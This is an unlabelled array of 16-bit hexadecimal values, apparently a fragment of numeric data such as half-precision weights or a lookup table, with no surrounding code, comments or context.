0xb8aa, 0xa663, 0x35ee, 0xb5cf, 0x3612, 0x27a6, 0x3140, 0xae42, 0x3199, 0x3538, 0xb2f1, 0xb1bd, 0x1067, 0x3537, 0x3655, 0xaffb, 0x3089, 0x33de, 0x2ed0, 0x34a0, 0x33fc, 0xb288, 0x3469, 0xb18c, 0x3549, 0xb45f, 0x38cb, 0x31ce, 0x299c, 0x268e, 0x316c, 0xa449, 0x3420, 0x36b3, 0x302e, 0x3013, 0x3199, 0x3538, 0x2f96, 0xb104, 0xb404, 0x3566, 0x299a, 0x306a, 0x32a3, 0xb581, 0xb2c4, 0xad9e, 0xb2ca, 0x3157, 0xb0c6, 0x2ced, 0xac74, 0xa4b4, 0xb8aa, 0xa663, 0x380e, 0x2b06, 0x28ec, 0xb471, 0xb54a, 0x301f, 0x34bf, 0xb02d, 0x2e59, 0xaf8f, 0xa453, 0x3279, 0x3655, 0xaffb, 0x2e2c, 0x2e77, 0xb8b5, 0xb610, 0xb19b, 0xb30f, 0xb1f3, 0x3554, 0xaf15, 0xa347, 0xac7b, 0x31de, 0x2a19, 0xaed8, 0x2fbb, 0x2554, 0x3016, 0x29d2, 0x3326, 0xb2e1, 0x3418, 0xb096, 0xb0ef, 0xb505, 0x3515, 0xb3b7, 0xb593, 0xb475, 0x25b7, 0x3534, 0xb746, 0xa86f, 0x34db, 0x36c6, 0x3495, 0xb583, 0xb63f, 0xb0b6, 0xb825, 0xb3d7, 0xa702, 0xb1e8, 0x350c, 0x34e3, 0x3752, 0x3220, 0x3274, 0x2099, 0x2d40, 0x3020, 0x35f8, 0xaea7, 0x3419, 0x33a9, 0xb76c, 0xafd0, 0xb631, 0x111f, 0xa89b, 0x2288, 0x135c, 0xb8af, 0x3140, 0xae42, 0x3765, 0x314f, 0x33ae, 0x377a, 0x34dc, 0x2fb0, 0xa71f, 0xb00d, 0xb65d, 0x373a, 0xb7fd, 0x30e9, 0xb902, 0xac20, 0x3457, 0x3419, 0x28da, 0x303d, 0xb0bb, 0x3422, 0xb3d2, 0x3275, 0xb25d, 0xae91, 0xa11f, 0xaeec, 0x283a, 0xad51, 0xb560, 0x32fe, 0x1067, 0x3537, 0xa5bf, 0xb11d, 0x3333, 0x323a, 0x38bf, 0x2b46, 0x3594, 0x3342, 0x3178, 0x322c, 0xb461, 0xb2e7, 0xb6d9, 0xb7d4, 0xb64c, 0xb20a, 0xb511, 0xac8f, 0x3202, 0xb412, 0x3343, 0x2c4a, 0xb4d9, 0xb4ec, 0xb1c8, 0x38ba, 0x2ce3, 0xb43e, 0xb371, 0x2d83, 0xa481, 0xb48e, 0x330f, 0x37b4, 0x31ff, 0x3751, 0x3435, 0xb5c7, 0x30c7, 0x2bfc, 0x3733, 0xb604, 0x26b6, 0x3564, 0x313b, 0xb477, 0x3303, 0x31c2, 0xb4ff, 0x34eb, 0xb4bf, 0xb12b, 0xa2ff, 0x3708, 0x356c, 0x3647, 0x2f14, 0xb846, 0x353c, 0x33b7, 0x2c23, 0xb365, 0x3612, 0x27a6, 0x2711, 0xb1af, 0x3677, 0xaa64, 0xb055, 0x2e8b, 0xb329, 0x2ce7, 0x33af, 0x2c8b, 0xb1e9, 0xb59f, 0x2e86, 0xb400, 0xac6a, 0x2b50, 0x34af, 0xb76c, 0x2daa, 0x358a, 0x3971, 0x3453, 0xb545, 0xb6f2, 0xb824, 0xb297, 0xa474, 0x2fe4, 0xb049, 0xa846, 0xb2f1, 0xb1bd, 0xb241, 0x33c6, 0x3465, 0xb39a, 0x3740, 0x32b1, 0xb169, 0xa9ec, 0x302d, 0x3508, 0x2ecc, 0xaeb8, 0x2d9f, 0xb64c, 0xb451, 0xb83e, 0x35ee, 0xb5cf, 0x2ac0, 0x34e9, 0x31f1, 0xb188, 0x3939, 0x1db0, 0xa639, 0xb24a, 0x31ce, 0x2b87, 0x361d, 0xb09c, 0x3089, 0x33de, 0x2e46, 0xb081, 0xb8e5, 0x2a59, 0xb66f, 0x184a, 0xb0d7, 0x2a40, 0xb848, 0xb062, 0xa6b2, 0x2fc0, 0x2db5, 0x2d13, 0xb8a1, 0xb585, 0xb4d0, 0xa824, 0x3463, 0xa761, 0x20f7, 0xa2c2, 0xaf0b, 0x32a3, 0x3861, 0x3048, 0xb471, 0xaa05, 0xb7f5, 0x3141, 0xb11b, 0x2d8a, 0xadff, 0xa93a, 0x2c6e, 0x38bc, 0xb4ca, 0x36aa, 0x2ff5, 0x2c0d, 0x32fe, 0x3786, 0xb6c1, 0xad0e, 0xb52d, 0x307f, 0x2ed0, 0x34a0, 0x3420, 0x36b3, 0xb2c4, 0xad9e, 0xb54a, 0x301f, 0xb19b, 0xb30f, 0x3326, 0xb2e1, 0x34db, 0x36c6, 0x3274, 0x2099, 0x135c, 0xb8af, 0xb7fd, 0x30e9, 0xa11f, 0xaeec, 0x3594, 0x3342, 0x3343, 0x2c4a, 0x31ff, 0x3751, 0xb4ff, 0x34eb, 0x3612, 0x27a6, 0x2ed0, 0x34a0, 0xb2c4, 0xad9e, 0xb19b, 0xb30f, 0x34db, 0x36c6, 0x135c, 0xb8af, 0xa11f, 0xaeec, 0x3343, 0x2c4a, 0xb4ff, 0x34eb, 0x2e86, 0xb400, 0x302d, 0x3508, 0xb66f, 0x184a, 0xadff, 0xa93a, 0x302e, 0x3013, 0x34bf, 0xb02d, 0x3418, 0xb096, 0x2d40, 0x3020, 0x3420, 0x36b3, 0xb54a, 0x301f, 0x3326, 0xb2e1, 0x3274, 0x2099, 0xb7fd, 0x30e9, 0x3594, 0x3342, 0x31ff, 0x3751, 0x3612, 0x27a6, 0xa474, 0x2fe4, 0x3939, 0x1db0, 0x3463, 0xa761, 0x33fc, 0xb288, 0xb2ca, 0x3157, 0xb1f3, 0x3554, 0x3495, 0xb583, 0x3140, 0xae42, 0x2ed0, 0x34a0, 0xb54a, 0x301f, 0x34db, 0x36c6, 0xb7fd, 0x30e9, 0x3343, 0x2c4a, 0x3612, 0x27a6, 0x302d, 0x3508, 0x3463, 0xa761, 0x302e, 0x3013, 0xb1f3, 0x3554, 0x2d40, 0x3020, 0x283a, 0xad51, 0x3435, 0xb5c7, 0xac6a, 0x2b50, 0xa639, 0xb24a, 0x2c6e, 0x38bc, 0x3420, 0x36b3, 0xb19b, 0xb30f, 0x3274, 0x2099, 0xa11f, 0xaeec, 0x31ff, 0x3751, 0x2e86, 0xb400, 0x3939, 0x1db0, 0xadff, 0xa93a, 0xb2ca, 0x3157, 0x3418, 0xb096, 0x3140, 0xae42, 0x3178, 0x322c, 0xb4bf, 0xb12b, 0xb049, 0xa846, 0xb0d7, 0x2a40, 0x3469, 0xb18c, 0xb2c4, 0xad9e, 0x3326, 0xb2e1, 0x135c, 0xb8af, 0x3594, 0x3342, 0xb4ff, 0x34eb, 0xa474, 0x2fe4, 0xb66f, 0x184a, 0x33fc, 0xb288, 0x34bf, 0xb02d, 0x3495, 0xb583, 0xb902, 0xac20, 0xb4d9, 0xb4ec, 0x2711, 0xb1af, 0x2ecc, 0xaeb8, 0x20f7, 0xa2c2, 0x3199, 0x3538, 0x2ed0, 0x34a0, 0xb19b, 0xb30f, 0x135c, 0xb8af, 0x3343, 0x2c4a, 0x2e86, 0xb400, 0xb66f, 0x184a, 0x302e, 0x3013, 0x3418, 0xb096, 0xb902, 0xac20, 0x3435, 0xb5c7, 0xb049, 0xa846, 0x20f7, 0xa2c2, 0xb0c6, 0x2ced, 0xb63f, 0xb0b6, 0xb560, 0x32fe, 0xa2ff, 0x3708, 0x3420, 0x36b3, 0x3326, 0xb2e1, 0xb7fd, 0x30e9, 0x31ff, 0x3751, 0xa474, 0x2fe4, 0x3463, 0xa761, 0xb2ca, 0x3157, 0x3495, 0xb583, 0x283a, 0xad51, 0xb4bf, 0xb12b, 0x2ecc, 0xaeb8, 0x2c6e, 0x38bc, 0x2e59, 0xaf8f, 0x35f8, 0xaea7, 0xb461, 0xb2e7, 0x3677, 0xaa64, 0xb2c4, 0xad9e, 0x34db, 0x36c6, 0xa11f, 0xaeec, 0xb4ff, 0x34eb, 0x302d, 0x3508, 0xadff, 0xa93a, 0x34bf, 0xb02d, 0x2d40, 0x3020, 0x3178, 0x322c, 0x2711, 0xb1af, 0xa639, 0xb24a, 0x3469, 0xb18c, 0xaf15, 0xa347, 0x3765, 0x314f, 0xb1c8, 0x38ba, 0x34af, 0xb76c, 0xb54a, 0x301f, 0x3274, 0x2099, 0x3594, 0x3342, 0x3612, 0x27a6, 0x3939, 0x1db0, 0x33fc, 0xb288, 0xb1f3, 0x3554, 0x3140, 0xae42, 0xb4d9, 0xb4ec, 0xac6a, 0x2b50, 0xb0d7, 0x2a40, 0x3199, 0x3538, 0xb0ef, 0xb505, 0x3457, 0x3419, 0x30c7, 0x2bfc, 0xb2f1, 0xb1bd, 0x2ed0, 0x34a0, 0x3274, 0x2099, 0xb4ff, 0x34eb, 0x3463, 0xa761, 0x3418, 0xb096, 0xb4d9, 0xb4ec, 0xa639, 0xb24a, 0x2e59, 0xaf8f, 0xb560, 0x32fe, 0xb2f1, 0xb1bd, 0x2f96, 0xb104, 0x33ae, 0x377a, 0xb055, 0x2e8b, 0x2ff5, 0x2c0d, 0xa702, 0xb1e8, 0x26b6, 0x3564, 0x3420, 0x36b3, 0x135c, 0xb8af, 0x3612, 0x27a6, 0xadff, 0xa93a, 0x3495, 0xb583, 0x3435, 0xb5c7, 0xb0d7, 0x2a40, 0xaf15, 0xa347, 0xb461, 0xb2e7, 0x2d9f, 0xb64c, 0xac74, 0xa4b4, 0x28da, 0x303d, 0x2daa, 0x358a, 0x38cb, 0x31ce, 0xb76c, 0xafd0, 0x2f14, 0xb846, 0xb2c4, 0xad9e, 0xb7fd, 0x30e9, 0x2e86, 0xb400, 0x33fc, 0xb288, 0x2d40, 0x3020, 0xb4bf, 0xb12b, 0x20f7, 0xa2c2, 0xb0ef, 0xb505, 0xb1c8, 0x38ba, 0x31ce, 0x2b87, 0xa453, 0x3279, 0x1067, 0x3537, 0xb241, 0x33c6, 0xb404, 0x3566, 0x34dc, 0x2fb0, 0xb329, 0x2ce7, 0xb54a, 0x301f, 0xa11f, 0xaeec, 0xa474, 0x2fe4, 0x302e, 0x3013, 0x3140, 0xae42, 0x2711, 0xb1af, 0x2c6e, 0x38bc, 0xb63f, 0xb0b6, 0x30c7, 0x2bfc, 0xb848, 0xb062, 0xac7b, 0x31de, 0xb6d9, 0xb7d4, 0xb451, 0xb83e, 0xb8aa, 0xa663, 0xb0bb, 0x3422, 0x3971, 0x3453, 0xb19b, 0xb30f, 0x3594, 0x3342, 0x302d, 0x3508, 0xb2ca, 0x3157, 0xb902, 0xac20, 0xac6a, 0x2b50, 0x3469, 0xb18c, 0x35f8, 0xaea7, 0xa2ff, 0x3708, 0xaf0b, 0x32a3, 0x3515, 0xb3b7, 0x2ce3, 0xb43e, 0x361d, 0xb09c, 0x3655, 0xaffb, 0xa5bf, 0xb11d, 0x3465, 0xb39a, 0x3326, 0xb2e1, 0x3343, 0x2c4a, 0x3939, 0x1db0, 0x34bf, 0xb02d, 0x283a, 0xad51, 0xb049, 0xa846, 0x3199, 0x3538, 0x3765, 0x314f, 0x3677, 0xaa64, 0xb4ca, 0x36aa, 0xb825, 0xb3d7, 0x3733, 0xb604, 0xa6b2, 0x2fc0, 0x2a19, 0xaed8, 0xb64c, 0xb20a, 0x35ee, 0xb5cf, 0x34db, 0x36c6, 0x31ff, 0x3751, 0xb66f, 0x184a, 0xb1f3, 0x3554, 0x3178, 0x322c, 0x2ecc, 0xaeb8, 0xb0c6, 0x2ced, 0x3457, 0x3419, 0x34af, 0xb76c, 0x3549, 0xb45f, 0x3419, 0x33a9, 0x356c, 0x3647, 0x3861, 0x3048, 0xb593, 0xb475, 0xb371, 0x2d83, 0x3089, 0x33de, 0x2ed0, 0x34a0, 0x2e86, 0xb400, 0xb902, 0xac20, 0xb0c6, 0x2ced, 0x2d9f, 0xb64c, 0xb6d9, 0xb7d4, 0x2a19, 0xaed8, 0x2db5, 0x2d13, 0x313b, 0xb477, 0x3752, 0x3220, 0xb52d, 0x307f, 0x241f, 0xb5e1, 0x9ced, 0xb09e, 0x38a8, 0xb6fd, 0x2c9d, 0xb33d, 0xb4d2, 0x2445, 0x3420, 0x36b3, 0xa474, 0x2fe4, 0x283a, 0xad51, 0x2e59, 0xaf8f, 0x31ce, 0x2b87, 0x2ce3, 0xb43e, 0xb593, 0xb475, 0xb471, 0xaa05, 0x353c, 0x33b7, 0xa89b, 0x2288, 0x2d7f, 0x2cd6, 0xb485, 0xb639, 0xb84a, 0xb30d, 0xae24, 0x3870, 0x380c, 0x2912, 0x3668, 0x34e1, 0xb2c4, 0xad9e, 0x302d, 0x3508, 0x3178, 0x322c, 0xaf15, 0xa347, 0xb848, 0xb062, 0x3733, 0xb604, 0xa702, 0xb1e8, 0x32fe, 0x3786, 0x33af, 0x2c8b, 0xb65d, 0x373a, 0x3365, 0x35db, 0xb35c, 0xad38, 0x3838, 0xb42a, 0xb809, 0xb85b, 0x3482, 0xa9fc, 0x35e3, 0xb280, 0xb54a, 0x301f, 0x3939, 0x1db0, 0xb4d9, 0xb4ec, 0xb0ef, 0xb505, 0xaf0b, 0x32a3, 0x356c, 0x3647, 0xb76c, 0xafd0, 0x299c, 0x268e, 0xb545, 0xb6f2, 0xb25d, 0xae91, 0xad36, 0xb646, 0x1e21, 0x323b, 0xb793, 0x3200, 0xaa52, 0x3790, 0x26ac, 0xb68e, 0xa8fb, 0xb766, 0xb19b, 0xb30f, 0xb66f, 0x184a, 0x3435, 0xb5c7, 0xb63f, 0xb0b6, 0xb4ca, 0x36aa, 0xb055, 0x2e8b, 0x34dc, 0x2fb0, 0x299a, 0x306a, 0x3740, 0x32b1, 0x38bf, 0x2b46, 0x331d, 0x33d4, 0xb732, 0x2888, 0x98c1, 0x346d, 0xac19, 0x343f, 0xb47e, 0x31f9, 0xaf6d, 0xaa1d, 0x3326, 0xb2e1, 0x3463, 0xa761, 0xb4bf, 0xb12b, 0x35f8, 0xaea7, 0x3549, 0xb45f, 0x2daa, 0x358a, 0xb0bb, 0x3422, 0x380e, 0x2b06, 0x2ac0, 0x34e9, 0x3202, 0xb412, 0x2f2e, 0xb511, 0x34d3, 0x341a, 0x34fb, 0xacfe, 0x2cae, 0x3855, 0x31a6, 0xb585, 0xb831, 0x2595, 0x34db, 0x36c6, 0xadff, 0xa93a, 0x2711, 0xb1af, 0x3765, 0x314f, 0x2f96, 0xb104, 0xb241, 0x33c6, 0xa5bf, 0xb11d, 0x2e2c, 0x2e77, 0x2e46, 0xb081, 0x330f, 0x37b4, 0x2e72, 0x2cd2, 0xb827, 0x338d, 0x2c50, 0xb07a, 0xb00d, 0x3443, 0x33af, 0x3242, 0x3592, 0x1cdc, 0x3274, 0x2099, 0x33fc, 0xb288, 0xac6a, 0x2b50, 0x3457, 0x3419, 0xac74, 0xa4b4, 0xb451, 0xb83e, 0xb64c, 0xb20a, 0x2fbb, 0x2554, 0xb8a1, 0xb585, 0x3303, 0x31c2, 0x354f, 0xb081, 0xa824, 0x390e, 0x3157, 0x2284, 0xb1d4, 0x3233, 0x32db, 0xa9d1, 0x2a26, 0xa8a8, 0x135c, 0xb8af, 0x302e, 0x3013, 0xb049, 0xa846, 0xb560, 0x32fe, 0xa453, 0x3279, 0x361d, 0xb09c, 0xb371, 0x2d83, 0x25b7, 0x3534, 0xb7f5, 0x3141, 0x2c23, 0xb365, 0x31f0, 0xa07e, 0xb1e1, 0x25ae, 0x2d02, 0x2ceb, 0x3172, 0x36e4, 0x3874, 0xad74, 0xb1fc, 0xb189, 0xb7fd, 0x30e9, 0xb2ca, 0x3157, 0x2ecc, 0xaeb8, 0xb461, 0xb2e7, 0xac7b, 0x31de, 0xa6b2, 0x2fc0, 0x26b6, 0x3564, 0x350c, 0x34e3, 0xb6c1, 0xad0e, 0xb1e9, 0xb59f, 0x30c9, 0xb23e, 0x3517, 0x36e4, 0x2886, 0xb7cb, 0x303b, 0x32e7, 0xb357, 0x29fe, 0xb06a, 0xb7b9, 0xa11f, 0xaeec, 0x34bf, 0xb02d, 0xa639, 0xb24a, 0xb1c8, 0x38ba, 0x3515, 0xb3b7, 0x3861, 0x3048, 0x2f14, 0xb846, 0xb631, 0x111f, 0x316c, 0xa449, 0xb824, 0xb297, 0x29f3, 0xb23b, 0xa6c5, 0x2e2b, 0x34e1, 0xa780, 0x3544, 0x2d07, 0xb0a1, 0x30b8, 0xa69d, 0xb1f9, 0x3594, 0x3342, 0xb1f3, 0x3554, 0xb0d7, 0x2a40, 0x30c7, 0x2bfc, 0xb825, 0xb3d7, 0x2ff5, 0x2c0d, 0xb329, 0x2ce7, 0xa71f, 0xb00d, 0x32a3, 0xb581, 0xb169, 0xa9ec, 0xb48b, 0xb030, 0x3451, 0xa93e, 0x27f8, 0x2b97, 0x3353, 0x3445, 0xaecf, 0x332f, 0x2fdf, 0xac15, 0x3343, 0x2c4a, 0x3418, 0xb096, 0x20f7, 0xa2c2, 0xa2ff, 0x3708, 0x3419, 0x33a9, 0x38cb, 0x31ce, 0x3971, 0x3453, 0xb3d2, 0x3275, 0x28ec, 0xb471, 0x31f1, 0xb188, 0x301a, 0xad51, 0xb525, 0x2d4a, 0x301e, 0xaeff, 0xb467, 0xb530, 0x3139, 0x34cb, 0xb4d6, 0xb374, 0x31ff, 0x3751, 0x3495, 0xb583, 0x2c6e, 0x38bc, 0x3677, 0xaa64, 0x33ae, 0x377a, 0xb404, 0x3566, 0x3465, 0xb39a, 0x3333, 0x323a, 0xb8b5, 0xb610, 0xb8e5, 0x2a59, 0x33bd, 0xb013, 0xad50, 0xb43d, 0x3449, 0x2eb6, 0x349b, 0xb48b, 0x33b5, 0x3038, 0xb158, 0x2cf1, 0xb4ff, 0x34eb, 0x2d40, 0x3020, 0x3469, 0xb18c, 0x34af, 0xb76c, 0x28da, 0x303d, 0xb8aa, 0xa663, 0x35ee, 0xb5cf, 0xb511, 0xac8f, 0x3016, 0x29d2, 0xb4d0, 0xa824, 0x363d, 0x9ff7, 0xb379, 0x3378, 0x2c0f, 0xa246, 0x35dc, 0xb55f, 0xae83, 0x276a, 0x3590, 0x380c, 0x3612, 0x27a6, 0x3140, 0xae42, 0x3199, 0x3538, 0xb2f1, 0xb1bd, 0x1067, 0x3537, 0x3655, 0xaffb, 0x3089, 0x33de, 0xa481, 0xb48e, 0xb746, 0xa86f, 0xb11b, 0x2d8a, 0x30eb, 0x94af, 0xb079, 0xb226, 0x3466, 0xb363, 0xa9ab, 0x3657, 0x322e, 0xb40c, 0x344a, 0x3107, 0x2ed0, 0x34a0, 0x33fc, 0xb288, 0x3469, 0xb18c, 0x3549, 0xb45f, 0x38cb, 0x31ce, 0x299c, 0x268e, 0x316c, 0xa449, 0x2d7f, 0x2cd6, 0xb1e1, 0x25ae, 0x3466, 0xb363, 0x33af, 0x3242, 0xb158, 0x2cf1, 0x368d, 0x24ce, 0x1caf, 0x2c99, 0xaccc, 0xa528, 0x3562, 0x2e33, 0x3420, 0x36b3, 0x302e, 0x3013, 0x3199, 0x3538, 0x2f96, 0xb104, 0xb404, 0x3566, 0x299a, 0x306a, 0x32a3, 0xb581, 0x3365, 0x35db, 0x3517, 0x36e4, 0x38a8, 0xb6fd, 0x32db, 0xa9d1, 0x3590, 0x380c, 0xa726, 0x2e46, 0xb6d9, 0xb683, 0xb4b8, 0x324b, 0xad35, 0x3436, 0xb2c4, 0xad9e, 0xb2ca, 0x3157, 0xb0c6, 0x2ced, 0xac74, 0xa4b4, 0xb8aa, 0xa663, 0x380e, 0x2b06, 0x28ec, 0xb471, 0xad36, 0xb646, 0xa6c5, 0x2e2b, 0xae24, 0x3870, 0x3874, 0xad74, 0x344a, 0x3107, 0x319b, 0xaccb, 0x2100, 0x3733, 0x3482, 0xaf7c, 0xaca2, 0x31ca, 0xb54a, 0x301f, 0x34bf, 0xb02d, 0x2e59, 0xaf8f, 0xa453, 0x3279, 0x3655, 0xaffb, 0x2e2c, 0x2e77, 0xb8b5, 0xb610, 0x331d, 0x33d4, 0x3451, 0xa93e, 0xb809, 0xb85b, 0xb357, 0x29fe, 0xa860, 0x36e0, 0xa92c, 0xa1fe, 0xb55b, 0x9b4e, 0xb499, 0x31ac, 0x3671, 0xb378, 0xb19b, 0xb30f, 0xb1f3, 0x3554, 0xaf15, 0xa347, 0xac7b, 0x31de, 0x2a19, 0xaed8, 0x2fbb, 0x2554, 0x3016, 0x29d2, 0x2f2e, 0xb511, 0xb525, 0x2d4a, 0xaa52, 0x3790, 0xb0a1, 0x30b8, 0xb17f, 0xb776, 0x2ea7, 0xb3b9, 0xad6e, 0xa865, 0xa3e8, 0x2882, 0xb434, 0xabb0, 0x3326, 0xb2e1, 0x3418, 0xb096, 0xb0ef, 0xb505, 0x3515, 0xb3b7, 0xb593, 0xb475, 0x25b7, 0x3534, 0xb746, 0xa86f, 0x2e72, 0x2cd2, 0xad50, 0xb43d, 0xac19, 0x343f, 0xaecf, 0x332f, 0x1015, 0x364c, 0x32b0, 0x36d0, 0x31c1, 0xb01c, 0xb1cd, 0x32ba, 0xb9fd, 0x116d, 0x34db, 0x36c6, 0x3495, 0xb583, 0xb63f, 0xb0b6, 0xb825, 0xb3d7, 0xa702, 0xb1e8, 0x350c, 0x34e3, 0x3752, 0x3220, 0x354f, 0xb081, 0xb379, 0x3378, 0x2cae, 0x3855, 0x3139, 0x34cb, 0xb245, 0x365a, 0xb2b6, 0x3494, 0x2e11, 0x24a6, 0x27e8, 0xa922, 0xacf8, 0xb5e6, 0x3274, 0x2099, 0x2d40, 0x3020, 0x35f8, 0xaea7, 0x3419, 0x33a9, 0xb76c, 0xafd0, 0xb631, 0x111f, 0xa89b, 0x2288, 0x31f0, 0xa07e, 0xb079, 0xb226, 0xb00d, 0x3443, 0x33b5, 0x3038, 0xad3d, 0x32e6, 0xb0e3, 0xaf7a, 0x313e, 0xb281, 0xb56e, 0x2fd1, 0xb1ef, 0xb522, 0x135c, 0xb8af, 0x3140, 0xae42, 0x3765, 0x314f, 0x33ae, 0x377a, 0x34dc, 0x2fb0, 0xa71f, 0xb00d, 0xb65d, 0x373a, 0x30c9, 0xb23e, 0x9ced, 0xb09e, 0xb1d4, 0x3233, 0xae83, 0x276a, 0x3802, 0x320d, 0xb509, 0xadd0, 0x244a, 0xadd2, 0xab81, 0xb14c, 0x339c, 0xb71d, 0xb7fd, 0x30e9, 0xb902, 0xac20, 0x3457, 0x3419, 0x28da, 0x303d, 0xb0bb, 0x3422, 0xb3d2, 0x3275, 0xb25d, 0xae91, 0x29f3, 0xb23b, 0xb84a, 0xb30d, 0x3172, 0x36e4, 0x322e, 0xb40c, 0x2dfa, 0x323e, 0xb2ca, 0xa6e4, 0x2d86, 0xb17b, 0xa400, 0xae99, 0xb190, 0xb597, 0xa11f, 0xaeec, 0x283a, 0xad51, 0xb560, 0x32fe, 0x1067, 0x3537, 0xa5bf, 0xb11d, 0x3333, 0x323a, 0x38bf, 0x2b46, 0xb48b, 0xb030, 0x3838, 0xb42a, 0x303b, 0x32e7, 0xb4d2, 0x2445, 0xa9f1, 0x2d56, 0xa706, 0xb3f8, 0x2c37, 0xa654, 0xb1c3, 0xb5cb, 0x281f, 0xb76d, 0x3594, 0x3342, 0x3178, 0x322c, 0xb461, 0xb2e7, 0xb6d9, 0xb7d4, 0xb64c, 0xb20a, 0xb511, 0xac8f, 0x3202, 0xb412, 0x301a, 0xad51, 0xb793, 0x3200, 0x3544, 0x2d07, 0x3668, 0x34e1, 0x2963, 0xae86, 0xb466, 0xafd6, 0x30ac, 0xb881, 0xad2d, 0x3541, 0x30ab, 0xa6a4, 0x3343, 0x2c4a, 0xb4d9, 0xb4ec, 0xb1c8, 0x38ba, 0x2ce3, 0xb43e, 0xb371, 0x2d83, 0xa481, 0xb48e, 0x330f, 0x37b4, 0x33bd, 0xb013, 0x98c1, 0x346d, 0x3353, 0x3445, 0x35e3, 0xb280, 0xadd5, 0x39e0, 0xa345, 0x9ffe, 0x35b7, 0xb71f, 0x3138, 0x2f0b, 0xb368, 0x8af8, 0x31ff, 0x3751, 0x3435, 0xb5c7, 0x30c7, 0x2bfc, 0x3733, 0xb604, 0x26b6, 0x3564, 0x313b, 0xb477, 0x3303, 0x31c2, 0x363d, 0x9ff7, 0x34fb, 0xacfe, 0xb467, 0xb530, 0xa8fb, 0xb766, 0xb521, 0x36b3, 0x3513, 0xba62, 0xaf29, 0x289c, 0x3314, 0xac14, 0x31f0, 0x37f7, 0xb4ff, 0x34eb, 0xb4bf, 0xb12b, 0xa2ff, 0x3708, 0x356c, 0x3647, 0x2f14, 0xb846, 0x353c, 0x33b7, 0x2c23, 0xb365, 0x30eb, 0x94af, 0x2c50, 0xb07a, 0x349b, 0xb48b, 0xaf6d, 0xaa1d, 0x3123, 0xada6, 0xb51c, 0x3283, 0x2fbe, 0x3571, 0xb4df, 0x2707, 0xb4fc, 0x2cd6, 0x3612, 0x27a6, 0x2711, 0xb1af, 0x3677, 0xaa64, 0xb055, 0x2e8b, 0xb329, 0x2ce7, 0x33af, 0x2c8b, 0xb1e9, 0xb59f, 0x241f, 0xb5e1, 0x3157, 0x2284, 0x35dc, 0xb55f, 0xb831, 0x2595, 0xb651, 0xaff5, 0xab7f, 0x2e83, 0xb54f, 0x34b3, 0x323e, 0xaa98, 0x37ac, 0x2d27, 0x2e86, 0xb400, 0xac6a, 0x2b50, 0x34af, 0xb76c, 0x2daa, 0x358a, 0x3971, 0x3453, 0xb545, 0xb6f2, 0xb824, 0xb297, 0xb485, 0xb639, 0x2d02, 0x2ceb, 0xa9ab, 0x3657, 0x3592, 0x1cdc, 0xb600, 0x9f69, 0xb689, 0xb458, 0xb368, 0x2df9, 0xac59, 0xac65, 0x2ff8, 0x3339, 0xa474, 0x2fe4, 0xb049, 0xa846, 0xb2f1, 0xb1bd, 0xb241, 0x33c6, 0x3465, 0xb39a, 0x3740, 0x32b1, 0xb169, 0xa9ec, 0xb35c, 0xad38, 0x2886, 0xb7cb, 0x2c9d, 0xb33d, 0x2a26, 0xa8a8, 0xb48e, 0xadad, 0x2833, 0x34dd, 0xb53a, 0xb86d, 0xacf7, 0xa422, 0x3331, 0xb4f0, 0x302d, 0x3508, 0x2ecc, 0xaeb8, 0x2d9f, 0xb64c, 0xb451, 0xb83e, 0x35ee, 0xb5cf, 0x2ac0, 0x34e9, 0x31f1, 0xb188, 0x1e21, 0x323b, 0x34e1, 0xa780, 0x380c, 0x2912, 0xb1fc, 0xb189, 0xaf03, 0xb654, 0xb72f, 0xaf40, 0x293a, 0x32dc, 0x3250, 0xaf43, 0xa013, 0x3450, 0x3939, 0x1db0, 0xa639, 0xb24a, 0x31ce, 0x2b87, 0x361d, 0xb09c, 0x3089, 0x33de, 0x2e46, 0xb081, 0xb8e5, 0x2a59, 0xb732, 0x2888, 0x27f8, 0x2b97, 0x3482, 0xa9fc, 0xb06a, 0xb7b9, 0xaff3, 0x3135, 0x28a2, 0x2d7d, 0xb43f, 0xa29f, 0xb1e4, 0x30f5, 0xbb7f, 0x3841, 0xb66f, 0x184a, 0xb0d7, 0x2a40, 0xb848, 0xb062, 0xa6b2, 0x2fc0, 0x2db5, 0x2d13, 0xb8a1, 0xb585, 0xb4d0, 0xa824, 0x34d3, 0x341a, 0x301e, 0xaeff, 0x26ac, 0xb68e, 0xa69d, 0xb1f9, 0xa9cd, 0x2008, 0x2f55, 0xb5f0, 0xb399, 0xb42d, 0x348a, 0x302b, 0xb5d9, 0x3299, 0x3463, 0xa761, 0x20f7, 0xa2c2, 0xaf0b, 0x32a3, 0x3861, 0x3048, 0xb471, 0xaa05, 0xb7f5, 0x3141, 0xb11b, 0x2d8a, 0xb827, 0x338d, 0x3449, 0x2eb6, 0xb47e, 0x31f9, 0x2fdf, 0xac15, 0x2d5f, 0xb5d9, 0xabc3, 0x2503, 0xadb1, 0x2db8, 0x3162, 0x3563, 0xae0d, 0x24be, 0xadff, 0xa93a, 0x2c6e, 0x38bc, 0xb4ca, 0x36aa, 0x2ff5, 0x2c0d, 0x32fe, 0x3786, 0xb6c1, 0xad0e, 0xb52d, 0x307f, 0xa824, 0x390e, 0x2c0f, 0xa246, 0x31a6, 0xb585, 0xb4d6, 0xb374, 0x32b2, 0x376a, 0xb343, 0x2c89, 0xb26b, 0xa87a, 0x3443, 0xb109, 0xb8d3, 0x2ec6, 0x2ed0, 0x34a0, 0x3420, 0x36b3, 0xb2c4, 0xad9e, 0xb54a, 0x301f, 0xb19b, 0xb30f, 0x3326, 0xb2e1, 0x34db, 0x36c6, 0x3274, 0x2099, 0x135c, 0xb8af, 0xb7fd, 0x30e9, 0xa11f, 0xaeec, 0x3594, 0x3342, 0x3343, 0x2c4a, 0x31ff, 0x3751, 0xb4ff, 0x34eb, 0x3612, 0x27a6, 0x2e86, 0xb400, 0xa474, 0x2fe4, 0x302d, 0x3508, 0x3939, 0x1db0, 0xb66f, 0x184a, 0x3463, 0xa761, 0xadff, 0xa93a, 0x2ed0, 0x34a0, 0xb2c4, 0xad9e, 0xb19b, 0xb30f, 0x34db, 0x36c6, 0x135c, 0xb8af, 0xa11f, 0xaeec, 0x3343, 0x2c4a, 0xb4ff, 0x34eb, 0x2e86, 0xb400, 0x302d, 0x3508, 0xb66f, 0x184a, 0xadff, 0xa93a, 0x302e, 0x3013, 0x34bf, 0xb02d, 0x3418, 0xb096, 0x2d40, 0x3020, 0xb902, 0xac20, 0x3178, 0x322c, 0x3435, 0xb5c7, 0x2711, 0xb1af, 0xb049, 0xa846, 0xa639, 0xb24a, 0x20f7, 0xa2c2, 0x3420, 0x36b3, 0xb54a, 0x301f, 0x3326, 0xb2e1, 0x3274, 0x2099, 